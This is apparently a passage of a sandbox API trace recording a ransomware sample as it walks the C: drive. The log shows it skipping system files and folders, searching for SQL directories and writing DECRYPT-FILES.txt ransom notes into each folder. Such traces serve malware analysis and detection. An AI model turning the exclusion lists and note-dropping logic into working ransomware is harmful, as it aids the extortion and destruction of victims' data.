dwReserved0=0x0, dwReserved1=0x0, cFileName="jkbimi8.tmp", cAlternateFileName="")) returned 1 [0071.388] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="DECRYPT-FILES.txt") returned 1 [0071.388] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="autorun.inf") returned 1 [0071.388] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="boot.ini") returned 1 [0071.389] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="desktop.ini") returned 1 [0071.389] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat") returned -1 [0071.389] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="iconcache.db") returned 1 [0071.389] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="bootsect.bak") returned 1 [0071.389] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat.log") returned -1 [0071.389] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="thumbs.db") returned -1 [0071.389] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="Bootfont.bin") returned 1 [0071.389] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0071.389] lstrcmpiW (lpString1="tmp", lpString2="lnk") returned 1 [0071.389] lstrcmpiW (lpString1="tmp", lpString2="exe") returned 1 [0071.389] lstrcmpiW (lpString1="tmp", lpString2="sys") returned 1 [0071.389] lstrcmpiW (lpString1="tmp", lpString2="dll") returned 1 [0071.389] lstrlenW (lpString="C:\\PerfLogs\\Admin\\") returned 18 [0071.389] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0071.389] lstrcpyW (in: lpString1=0x3f2eb9c, lpString2="C:\\PerfLogs\\Admin\\" | out: lpString1="C:\\PerfLogs\\Admin\\") returned="C:\\PerfLogs\\Admin\\" [0071.389] lstrcatW (in: lpString1="C:\\PerfLogs\\Admin\\", lpString2="jkbimi8.tmp" | out: lpString1="C:\\PerfLogs\\Admin\\jkbimi8.tmp") returned="C:\\PerfLogs\\Admin\\jkbimi8.tmp" [0071.389] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0071.389] CreateFileW (lpFileName="C:\\PerfLogs\\Admin\\jkbimi8.tmp" (normalized: "c:\\perflogs\\admin\\jkbimi8.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0071.389] CloseHandle (hObject=0x0) returned 0 [0071.389] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0071.390] FindNextFileW (in: hFindFile=0x5f8c18, lpFindFileData=0x3f2f3cc | out: lpFindFileData=0x3f2f3cc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa6c68280, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xa6c68280, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa6c68280, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="jkbimi8.tmp", cAlternateFileName="")) returned 0 [0071.390] FindClose (in: hFindFile=0x5f8c18 | out: hFindFile=0x5f8c18) returned 1 [0071.390] CloseHandle (hObject=0x420) returned 1 [0071.390] FindNextFileW (in: hFindFile=0x5f8bd8, lpFindFileData=0x3f2f648 | out: lpFindFileData=0x3f2f648*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa6c68280, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xa6c68280, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa6c68280, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0071.390] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0071.390] FindNextFileW (in: hFindFile=0x5f8bd8, lpFindFileData=0x3f2f648 | out: lpFindFileData=0x3f2f648*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa6c68280, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xa6c68280, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa6c68280, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="jkbimi8.tmp", cAlternateFileName="")) returned 1 [0071.390] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="DECRYPT-FILES.txt") returned 1 [0071.390] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="autorun.inf") returned 1 [0071.390] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="boot.ini") returned 1 [0071.390] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="desktop.ini") returned 1 [0071.390] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat") returned -1 [0071.390] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="iconcache.db") returned 1 [0071.390] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="bootsect.bak") returned 1 [0071.390] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat.log") returned -1 [0071.390] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="thumbs.db") returned -1 [0071.390] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="Bootfont.bin") returned 1 [0071.390] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0071.390] lstrcmpiW (lpString1="tmp", lpString2="lnk") returned 1 [0071.390] lstrcmpiW (lpString1="tmp", lpString2="exe") returned 1 [0071.390] lstrcmpiW (lpString1="tmp", lpString2="sys") returned 1 [0071.390] lstrcmpiW (lpString1="tmp", lpString2="dll") returned 1 [0071.390] lstrlenW (lpString="C:\\PerfLogs\\") returned 12 [0071.390] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0071.390] lstrcpyW (in: lpString1=0x3f2ee18, lpString2="C:\\PerfLogs\\" | out: lpString1="C:\\PerfLogs\\") returned="C:\\PerfLogs\\" [0071.390] lstrcatW (in: lpString1="C:\\PerfLogs\\", lpString2="jkbimi8.tmp" | out: lpString1="C:\\PerfLogs\\jkbimi8.tmp") returned="C:\\PerfLogs\\jkbimi8.tmp" [0071.390] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0071.391] CreateFileW (lpFileName="C:\\PerfLogs\\jkbimi8.tmp" (normalized: "c:\\perflogs\\jkbimi8.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0071.391] CloseHandle (hObject=0x0) returned 0 [0071.391] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0071.391] FindNextFileW (in: hFindFile=0x5f8bd8, lpFindFileData=0x3f2f648 | out: lpFindFileData=0x3f2f648*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa6c68280, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xa6c68280, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa6c68280, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="jkbimi8.tmp", cAlternateFileName="")) returned 0 [0071.391] FindClose (in: hFindFile=0x5f8bd8 | out: hFindFile=0x5f8bd8) returned 1 [0071.391] CloseHandle (hObject=0x418) returned 1 [0071.391] FindNextFileW (in: hFindFile=0x5f8ad8, lpFindFileData=0x3f2f8c4 | out: lpFindFileData=0x3f2f8c4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfd72e458, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x8b8c8230, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0x8b8c8230, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x625898, cFileName="Program Files", cAlternateFileName="PROGRA~1")) returned 1 [0071.391] lstrcmpW (lpString1="Program Files", lpString2=".") returned 1 [0071.391] lstrcmpW (lpString1="Program Files", lpString2="..") returned 1 [0071.391] lstrcatW (in: lpString1="Program Files", lpString2="\\" | out: lpString1="Program Files\\") returned="Program Files\\" [0071.391] lstrcatW (in: lpString1="C:\\", lpString2="Program Files\\" | out: lpString1="C:\\Program Files\\") returned="C:\\Program Files\\" [0071.391] StrStrW (lpFirst="C:\\Program Files\\", lpSrch="\\Program Files") returned="\\Program Files\\" [0071.392] StrStrW (lpFirst="C:\\Program Files\\", lpSrch=":\\Windows") returned 0x0 [0071.392] StrStrW (lpFirst="C:\\Program Files\\", lpSrch="\\Games\\") returned 0x0 [0071.392] StrStrW (lpFirst="C:\\Program Files\\", lpSrch="\\Tor Browser\\") returned 0x0 [0071.392] StrStrW (lpFirst="C:\\Program Files\\", lpSrch="\\ProgramData\\") returned 0x0 [0071.392] StrStrW (lpFirst="C:\\Program Files\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0071.392] StrStrW (lpFirst="C:\\Program Files\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0071.392] StrStrW (lpFirst="C:\\Program Files\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0071.392] StrStrW (lpFirst="C:\\Program Files\\", lpSrch="\\All Users") returned 0x0 [0071.392] StrStrW (lpFirst="C:\\Program Files\\", lpSrch="\\IETldCache\\") returned 0x0 [0071.392] StrStrW (lpFirst="C:\\Program Files\\", lpSrch="\\Local Settings\\") returned 0x0 [0071.392] StrStrW (lpFirst="C:\\Program Files\\", lpSrch="\\AppData\\Local") returned 0x0 [0071.392] StrStrW (lpFirst="C:\\Program Files\\", lpSrch="AhnLab") returned 0x0 [0071.392] StrStrW (lpFirst="C:\\Program Files\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0071.392] lstrlenW (lpString="C:\\Program Files\\") returned 17 [0071.392] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0071.392] wsprintfW (in: param_1=0x3f2ee28, param_2="%s\\%s" | out: param_1="C:\\Program Files\\\\jkbimi8.tmp") returned 29 [0071.392] CreateFileW (lpFileName="C:\\Program Files\\\\jkbimi8.tmp" (normalized: "c:\\program files\\jkbimi8.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x418 [0071.392] lstrlenW (lpString="C:\\Program Files\\") returned 17 [0071.392] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0071.392] wsprintfW (in: param_1=0x3f2ee28, param_2="%s\\%s" | out: param_1="C:\\Program Files\\\\DECRYPT-FILES.txt") returned 35 [0071.393] CreateFileW (lpFileName="C:\\Program Files\\\\DECRYPT-FILES.txt" (normalized: "c:\\program files\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x41c [0071.393] WriteFile (in: hFile=0x41c, lpBuffer=0xf70000*, nNumberOfBytesToWrite=0x23fc, lpNumberOfBytesWritten=0x3f2ee24, lpOverlapped=0x0 | out: lpBuffer=0xf70000*, lpNumberOfBytesWritten=0x3f2ee24*=0x23fc, lpOverlapped=0x0) returned 1 [0071.394] CloseHandle (hObject=0x41c) returned 1 [0071.394] lstrlenW (lpString="C:\\Program Files\\") returned 17 [0071.394] lstrcatW (in: lpString1="C:\\Program Files\\", lpString2="*" | out: lpString1="C:\\Program Files\\*") returned="C:\\Program Files\\*" [0071.394] FindFirstFileW (in: lpFileName="C:\\Program Files\\*", lpFindFileData=0x3f2f648 | out: lpFindFileData=0x3f2f648*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfd72e458, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xa6c68280, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa6c68280, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5f8bd8 [0071.394] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0071.394] FindNextFileW (in: hFindFile=0x5f8bd8, lpFindFileData=0x3f2f648 | out: lpFindFileData=0x3f2f648*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfd72e458, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xa6c68280, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa6c68280, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0071.394] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0071.394] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0071.394] FindNextFileW (in: hFindFile=0x5f8bd8, lpFindFileData=0x3f2f648 | out: lpFindFileData=0x3f2f648*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7545b2, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x69da35f0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x69da35f0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Common Files", cAlternateFileName="COMMON~1")) returned 1 [0071.394] lstrcmpW (lpString1="Common Files", lpString2=".") returned 1 [0071.394] lstrcmpW (lpString1="Common Files", lpString2="..") returned 1 [0071.394] lstrcatW (in: lpString1="Common Files", lpString2="\\" | out: lpString1="Common Files\\") returned="Common Files\\" [0071.394] lstrcatW (in: lpString1="C:\\Program Files\\", lpString2="Common Files\\" | out: lpString1="C:\\Program Files\\Common Files\\") returned="C:\\Program Files\\Common Files\\" [0071.394] StrStrW (lpFirst="C:\\Program Files\\Common Files\\", lpSrch="SQL") returned 0x0 [0071.395] FindNextFileW (in: hFindFile=0x5f8bd8, lpFindFileData=0x3f2f648 | out: lpFindFileData=0x3f2f648*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa6c68280, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xa6c68280, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa6c68280, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0071.395] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0071.395] FindNextFileW (in: hFindFile=0x5f8bd8, lpFindFileData=0x3f2f648 | out: lpFindFileData=0x3f2f648*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28ae853d, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x28ae853d, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x28ae853d, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0xae, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0071.395] lstrcmpiW (lpString1="desktop.ini", lpString2="DECRYPT-FILES.txt") returned 1 [0071.395] lstrcmpiW (lpString1="desktop.ini", lpString2="autorun.inf") returned 1 [0071.395] lstrcmpiW (lpString1="desktop.ini", lpString2="boot.ini") returned 1 [0071.395] lstrcmpiW (lpString1="desktop.ini", lpString2="desktop.ini") returned 0 [0071.395] FindNextFileW (in: hFindFile=0x5f8bd8, lpFindFileData=0x3f2f648 | out: lpFindFileData=0x3f2f648*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80046d91, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x9ef07a9b, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x9ef07a9b, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="DVD Maker", cAlternateFileName="DVDMAK~1")) returned 1 [0071.395] lstrcmpW (lpString1="DVD Maker", lpString2=".") returned 1 [0071.395] lstrcmpW (lpString1="DVD Maker", lpString2="..") returned 1 [0071.395] lstrcatW (in: lpString1="DVD Maker", lpString2="\\" | out: lpString1="DVD Maker\\") returned="DVD Maker\\" [0071.395] lstrcatW (in: lpString1="C:\\Program Files\\", lpString2="DVD Maker\\" | out: lpString1="C:\\Program Files\\DVD Maker\\") returned="C:\\Program Files\\DVD Maker\\" [0071.395] StrStrW (lpFirst="C:\\Program Files\\DVD Maker\\", lpSrch="SQL") returned 0x0 [0071.395] FindNextFileW (in: hFindFile=0x5f8bd8, lpFindFileData=0x3f2f648 | out: lpFindFileData=0x3f2f648*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd885082, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x8827ac50, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0x8827ac50, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Internet Explorer", cAlternateFileName="INTERN~1")) returned 1 [0071.395] lstrcmpW (lpString1="Internet Explorer", lpString2=".") returned 1 [0071.395] lstrcmpW (lpString1="Internet Explorer", lpString2="..") returned 1 [0071.395] lstrcatW (in: lpString1="Internet Explorer", lpString2="\\" | out: lpString1="Internet Explorer\\") returned="Internet Explorer\\" [0071.395] lstrcatW (in: lpString1="C:\\Program Files\\", lpString2="Internet Explorer\\" | out: lpString1="C:\\Program Files\\Internet Explorer\\") returned="C:\\Program Files\\Internet Explorer\\" [0071.395] StrStrW (lpFirst="C:\\Program Files\\Internet Explorer\\", lpSrch="SQL") returned 0x0 [0071.395] FindNextFileW (in: hFindFile=0x5f8bd8, lpFindFileData=0x3f2f648 | out: lpFindFileData=0x3f2f648*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa6c68280, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xa6c68280, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa6c68280, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="jkbimi8.tmp", cAlternateFileName="")) returned 1 [0071.395] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="DECRYPT-FILES.txt") returned 1 [0071.395] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="autorun.inf") returned 1 [0071.395] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="boot.ini") returned 1 [0071.395] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="desktop.ini") returned 1 [0071.395] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat") returned -1 [0071.395] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="iconcache.db") returned 1 [0071.395] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="bootsect.bak") returned 1 [0071.395] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat.log") returned -1 [0071.395] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="thumbs.db") returned -1 [0071.395] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="Bootfont.bin") returned 1 [0071.395] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0071.395] lstrcmpiW (lpString1="tmp", lpString2="lnk") returned 1 [0071.395] lstrcmpiW (lpString1="tmp", lpString2="exe") returned 1 [0071.395] lstrcmpiW (lpString1="tmp", lpString2="sys") returned 1 [0071.395] lstrcmpiW (lpString1="tmp", lpString2="dll") returned 1 [0071.396] lstrlenW (lpString="C:\\Program Files\\") returned 17 [0071.396] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0071.396] lstrcpyW (in: lpString1=0x3f2ee18, lpString2="C:\\Program Files\\" | out: lpString1="C:\\Program Files\\") returned="C:\\Program Files\\" [0071.396] lstrcatW (in: lpString1="C:\\Program Files\\", lpString2="jkbimi8.tmp" | out: lpString1="C:\\Program Files\\jkbimi8.tmp") returned="C:\\Program Files\\jkbimi8.tmp" [0071.396] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0071.396] CreateFileW (lpFileName="C:\\Program Files\\jkbimi8.tmp" (normalized: "c:\\program files\\jkbimi8.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0071.396] CloseHandle (hObject=0x0) returned 0 [0071.396] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0071.396] FindNextFileW (in: hFindFile=0x5f8bd8, lpFindFileData=0x3f2f648 | out: lpFindFileData=0x3f2f648*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfa1d4a90, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x88208830, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0x88208830, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft Analysis Services", cAlternateFileName="MICROS~2")) returned 1 [0071.396] lstrcmpW (lpString1="Microsoft Analysis Services", lpString2=".") returned 1 [0071.396] lstrcmpW (lpString1="Microsoft Analysis Services", lpString2="..") returned 1 [0071.396] lstrcatW (in: lpString1="Microsoft Analysis Services", lpString2="\\" | out: lpString1="Microsoft Analysis Services\\") returned="Microsoft Analysis Services\\" [0071.396] lstrcatW (in: lpString1="C:\\Program Files\\", lpString2="Microsoft Analysis Services\\" | out: lpString1="C:\\Program Files\\Microsoft Analysis Services\\") returned="C:\\Program Files\\Microsoft Analysis Services\\" [0071.396] StrStrW (lpFirst="C:\\Program Files\\Microsoft Analysis Services\\", lpSrch="SQL") returned 0x0 [0071.396] FindNextFileW (in: hFindFile=0x5f8bd8, lpFindFileData=0x3f2f648 | out: lpFindFileData=0x3f2f648*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xee2ce510, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x8822e990, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0x8822e990, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft Office", cAlternateFileName="MICROS~1")) returned 1 [0071.397] lstrcmpW (lpString1="Microsoft Office", lpString2=".") returned 1 [0071.397] lstrcmpW (lpString1="Microsoft Office", lpString2="..") returned 1 [0071.397] lstrcatW (in: lpString1="Microsoft Office", lpString2="\\" | out: lpString1="Microsoft Office\\") returned="Microsoft Office\\" [0071.397] lstrcatW (in: lpString1="C:\\Program Files\\", lpString2="Microsoft Office\\" | out: lpString1="C:\\Program Files\\Microsoft Office\\") returned="C:\\Program Files\\Microsoft Office\\" [0071.397] StrStrW (lpFirst="C:\\Program Files\\Microsoft Office\\", lpSrch="SQL") returned 0x0 [0071.397] FindNextFileW (in: hFindFile=0x5f8bd8, lpFindFileData=0x3f2f648 | out: lpFindFileData=0x3f2f648*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x50e54b70, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x88254af0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0x88254af0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft SQL Server Compact Edition", cAlternateFileName="MICROS~3")) returned 1 [0071.397] lstrcmpW (lpString1="Microsoft SQL Server Compact Edition", lpString2=".") returned 1 [0071.397] lstrcmpW (lpString1="Microsoft SQL Server Compact Edition", lpString2="..") returned 1 [0071.397] lstrcatW (in: lpString1="Microsoft SQL Server Compact Edition", lpString2="\\" | out: lpString1="Microsoft SQL Server Compact Edition\\") returned="Microsoft SQL Server Compact Edition\\" [0071.397] lstrcatW (in: lpString1="C:\\Program Files\\", lpString2="Microsoft SQL Server Compact Edition\\" | out: lpString1="C:\\Program Files\\Microsoft SQL Server Compact Edition\\") returned="C:\\Program Files\\Microsoft SQL Server Compact Edition\\" [0071.397] StrStrW (lpFirst="C:\\Program Files\\Microsoft SQL Server Compact Edition\\", lpSrch="SQL") returned="SQL Server Compact Edition\\" [0071.397] StrStrW (lpFirst="C:\\Program Files\\Microsoft SQL Server Compact Edition\\", lpSrch="\\Program Files") returned="\\Program Files\\Microsoft SQL Server Compact Edition\\" [0071.397] StrStrW (lpFirst="C:\\Program Files\\Microsoft SQL Server Compact Edition\\", lpSrch=":\\Windows") returned 0x0 [0071.397] StrStrW (lpFirst="C:\\Program Files\\Microsoft SQL Server Compact Edition\\", lpSrch="\\Games\\") returned 0x0 [0071.397] StrStrW (lpFirst="C:\\Program Files\\Microsoft SQL Server Compact Edition\\", lpSrch="\\Tor Browser\\") returned 0x0 [0071.397] StrStrW (lpFirst="C:\\Program Files\\Microsoft SQL Server Compact Edition\\", lpSrch="\\ProgramData\\") returned 0x0 [0071.397] StrStrW (lpFirst="C:\\Program Files\\Microsoft SQL Server Compact Edition\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0071.397] StrStrW (lpFirst="C:\\Program Files\\Microsoft SQL Server Compact Edition\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0071.397] StrStrW (lpFirst="C:\\Program Files\\Microsoft SQL Server Compact Edition\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0071.397] StrStrW (lpFirst="C:\\Program Files\\Microsoft SQL Server Compact Edition\\", lpSrch="\\All Users") returned 0x0 [0071.397] StrStrW (lpFirst="C:\\Program Files\\Microsoft SQL Server Compact Edition\\", lpSrch="\\IETldCache\\") returned 0x0 [0071.397] StrStrW (lpFirst="C:\\Program Files\\Microsoft SQL Server Compact Edition\\", lpSrch="\\Local Settings\\") returned 0x0 [0071.397] StrStrW (lpFirst="C:\\Program Files\\Microsoft SQL Server Compact Edition\\", lpSrch="\\AppData\\Local") returned 0x0 [0071.397] StrStrW (lpFirst="C:\\Program Files\\Microsoft SQL Server Compact Edition\\", lpSrch="AhnLab") returned 0x0 [0071.397] StrStrW (lpFirst="C:\\Program Files\\Microsoft SQL Server Compact Edition\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0071.397] lstrlenW (lpString="C:\\Program Files\\Microsoft SQL Server Compact Edition\\") returned 54 [0071.397] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0071.397] wsprintfW (in: param_1=0x3f2ebac, param_2="%s\\%s" | out: param_1="C:\\Program Files\\Microsoft SQL Server Compact Edition\\\\jkbimi8.tmp") returned 66 [0071.397] CreateFileW (lpFileName="C:\\Program Files\\Microsoft SQL Server Compact Edition\\\\jkbimi8.tmp" (normalized: "c:\\program files\\microsoft sql server compact edition\\jkbimi8.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x420 [0071.398] lstrlenW (lpString="C:\\Program Files\\Microsoft SQL Server Compact Edition\\") returned 54 [0071.398] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0071.398] wsprintfW (in: param_1=0x3f2ebac, param_2="%s\\%s" | out: param_1="C:\\Program Files\\Microsoft SQL Server Compact Edition\\\\DECRYPT-FILES.txt") returned 72 [0071.398] CreateFileW (lpFileName="C:\\Program Files\\Microsoft SQL Server Compact Edition\\\\DECRYPT-FILES.txt" (normalized: "c:\\program files\\microsoft sql server compact edition\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 